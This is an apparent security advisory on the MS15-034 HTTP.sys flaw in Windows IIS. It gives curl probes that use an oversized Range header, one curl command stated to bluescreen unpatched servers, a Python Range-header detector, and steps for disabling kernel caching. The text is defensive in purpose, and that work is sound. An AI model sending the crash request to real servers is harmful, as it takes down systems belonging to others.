On April 14, Microsoft released a critical security patch (MS15-034) for the HTTP protocol stack, which is commonly used by Windows IIS web services. While it doesn’t have a catchy nickname or slick logo, there have been some good discussions around it, and this is a serious vulnerability that affects millions of Internet-facing web servers.
Attackers are racing to reverse engineer this patch to remotely execute code and take over vulnerable systems. Right now, by sending a single, specially crafted HTTP request, an attacker can crash unpatched Windows web servers.
The patch supplied by Microsoft should be applied immediately. This vulnerability exists within HTTP.sys and is exploitable when the kernel caching feature of IIS is enabled. Kernel caching is enabled by default; where the patch cannot be applied immediately, disabling kernel caching mitigates this vulnerability.
Detecting the Vulnerability
The vulnerability can be triggered by specifying the Range header in an HTTP request. A vulnerable install will respond with an HTTP 416 Requested Range Not Satisfiable error.
#curl -v http://vulnerable.example.com/ -H "Range: bytes=00-18446744073709551615"
---snip---
< HTTP/1.1 416 Requested Range Not Satisfiable
< Content-Type: text/html
< Last-Modified: Mon, 03 Feb 2014 22:08:50 GMT
< Accept-Ranges: bytes
< ETag: "3fa4eb842c21cf1:0"
< Server: Microsoft-IIS/7.5
< Date: Thu, 16 Apr 2015 02:10:24 GMT
< Content-Length: 362
< Content-Range: bytes */151
Requesting a valid file with a Range that starts at byte 100 instead will result in a bluescreen.
#curl -v http://vulnerable.example.com/image.jpg -H "Range: bytes=100-18446744073709551615"
A patched install will respond with an HTTP 400 Bad Request error.
#curl -v http://vulnerable.example.com/ -H "Range: bytes=00-18446744073709551615"
---snip---
< HTTP/1.1 400 Bad Request
< Content-Type: text/html; charset=us-ascii
< Server: Microsoft-HTTPAPI/2.0
< Date: Thu, 16 Apr 2015 00:53:17 GMT
< Connection: close
< Content-Length: 339
Note: This exploitation was tested on an unpatched Windows 2008 R2 default IIS installation.
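The trigger described above is an oversized last-byte position in the Range header, so the same request pattern can be flagged at a proxy or WAF before it reaches HTTP.sys. As an added example (not from the original post or from Microsoft), the following Python parses the Range header of raw HTTP requests and classifies it; the 2**63 threshold and the sample requests are constructed assumptions, not observed traffic.

```python
import re
# Threshold above which a last-byte-pos is treated as suspicious (assumption, tunable):
# no real resource needs more than 63 bits, while the probe on this page sends 2**64 - 1.
SUSPICIOUS_LAST_BYTE_POS = 2**63 - 1
RANGE_SPEC = re.compile(r"^\s*(\d*)\s*-\s*(\d*)\s*$")

def parse_byte_ranges(range_value):
    """Parse "bytes=0-99, 200-" into (first, last) tuples; None if malformed."""
    unit, sep, specs = range_value.partition("=")
    if sep != "=" or unit.strip().lower() != "bytes":
        return None
    ranges = []
    for spec in specs.split(","):
        m = RANGE_SPEC.match(spec)
        if not m or (m.group(1) == "" and m.group(2) == ""):
            return None  # non-numeric positions, or "bytes=-"
        first = int(m.group(1)) if m.group(1) else None
        last = int(m.group(2)) if m.group(2) else None
        ranges.append((first, last))
    return ranges

def classify_range_header(range_value):
    """Return 'ok', 'malformed' or 'suspicious' for one Range header value."""
    ranges = parse_byte_ranges(range_value)
    if ranges is None:
        return "malformed"
    for first, last in ranges:
        if last is not None and last > SUSPICIOUS_LAST_BYTE_POS:
            return "suspicious"
        if first is not None and last is not None and first > last:
            return "malformed"
    return "ok"

def scan_requests(raw_requests):
    """Return (request_line, verdict) for every request carrying a Range header."""
    results = []
    for raw in raw_requests:
        lines = raw.split("\r\n")
        for header in lines[1:]:
            name, sep, value = header.partition(":")
            if sep and name.strip().lower() == "range":
                results.append((lines[0], classify_range_header(value.strip())))
    return results

# Constructed sample requests (not captured traffic): a normal partial download,
# the non-crashing MS15-034 probe shown on this page, and a malformed header.
SAMPLE_REQUESTS = [
    "GET /video.mp4 HTTP/1.1\r\nHost: www.example.com\r\nRange: bytes=0-1048575\r\n",
    "GET / HTTP/1.1\r\nHost: vulnerable.example.com\r\nRange: bytes=00-18446744073709551615\r\n",
    "GET /a.txt HTTP/1.1\r\nHost: www.example.com\r\nRange: bytes=abc\r\n",
]
```

Run `scan_requests(SAMPLE_REQUESTS)` to see one verdict per request; a `suspicious` verdict on an unpatched server is a reason to apply MS15-034 or disable kernel caching as described below.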
Mitigation for MS15-034
If the MS15-034 patch cannot be installed, the kernel caching feature can be disabled to prevent exploitation.
To disable kernel caching:
- Open IIS Manager
- In Features View, double-click Output Caching
- On the Output Caching page, in the Actions pane, click Edit feature settings
- In the Edit Output Cache Settings dialog box, deselect Enable kernel cache and then click OK